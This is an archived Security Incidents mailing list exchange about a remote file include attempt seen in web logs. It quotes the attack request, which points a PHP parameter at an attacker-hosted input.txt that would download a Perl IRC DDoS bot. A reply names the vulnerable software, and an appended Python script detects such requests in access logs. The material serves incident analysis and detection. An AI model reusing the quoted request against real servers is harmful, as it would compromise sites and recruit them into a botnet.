Security Incidents mailing list archives
Re: http://thebesthack.altervista.org/input.txt
From: "Bojan Zdrnja" <bojan.zdrnja () gmail com>
Date: Thu, 14 Dec 2006 13:33:44 +1300
Hi Josh,

On 12/14/06, modincidents () mail securityfocus com <modincidents () mail securityfocus com> wrote:
> An incidents subscriber emailed me stating that they were getting the following in their 404 logs:
>
> PHP.asp</activate.php?language=conf&footerpage=http://thebesthack.altervista.org/input.txt?
>
> It appears that an attacker is attempting to exploit a remote file include vulnerability. If the attack had been successful and the http://thebesthack.altervista.org/input.txt file was processed by the web server, it would have attempted to download, run, and then delete a file from http://thebesthack.altervista.org/ddos.pl. ddos.pl is a simple IRC bot written in Perl that will connect to dos-net.sytes.net:6667 and join #ddos.
>
> Does anyone know the specific vulnerability that this attack is attempting to exploit?
Yep, it's PHP Upload Center, http://www.securityfocus.com/bid/21412/info

Cheers,
Bojan
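Added example, not part of the original thread: a small Python scan of web access logs for the request pattern reported above, a query parameter whose value is a URL on a foreign host. The log lines are constructed (only the `activate.php` request string and its host come from the message), and `OWN_HOSTS`, `REMOTE_SCHEMES` and `find_rfi_attempts` are names assumed for this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache common-log style; client addresses are
# documentation ranges. Only the first request string is taken from the thread.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Dec/2006:00:12:01 +0000] "GET /activate.php?language=conf&footerpage=http://thebesthack.altervista.org/input.txt? HTTP/1.1" 404 209
192.0.2.11 - - [14/Dec/2006:00:12:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
192.0.2.12 - - [14/Dec/2006:00:13:40 +0000] "GET /view.php?inc=hTTp%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 404 209
192.0.2.13 - - [14/Dec/2006:00:14:02 +0000] "GET /login.php?next=http://www.example.com/home HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
REMOTE_SCHEMES = {"http", "https", "ftp"}   # schemes PHP can include remotely
OWN_HOSTS = {"www.example.com"}             # assumption: hosts this site legitimately links to

def find_rfi_attempts(log_text, own_hosts=OWN_HOSTS):
    """Return one record per query parameter whose value is a URL on a foreign host."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # Everything after the first '?' is the query; the trailing '?' that the
        # request appends to the included URL stays inside the parameter value.
        query = m.group("target").partition("?")[2]
        # parse_qsl percent-decodes, so encoded values (third sample line) are seen too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            try:
                url = urlsplit(value.strip())
            except ValueError:              # malformed value, e.g. an unbalanced '['
                continue
            host = url.hostname             # urlsplit lower-cases scheme and hostname
            if url.scheme in REMOTE_SCHEMES and host and host not in own_hosts:
                hits.append({
                    "client": line.split()[0],
                    "param": name,
                    "host": host,
                    "status": int(m.group("status")),
                })
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit logged with status 404, as in the report, means the targeted script was not present; the same pattern with a 200 is the one to investigate first.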
Current thread:
- http://thebesthack.altervista.org/input.txt modincidents (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt Bojan Zdrnja (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt ascii (Dec 14)
- Re: http://thebesthack.altervista.org/input.txt Adriano Carvalho (Dec 14)
- <Possible follow-ups>
- Re: http://thebesthack.altervista.org/input.txt santa (Dec 13)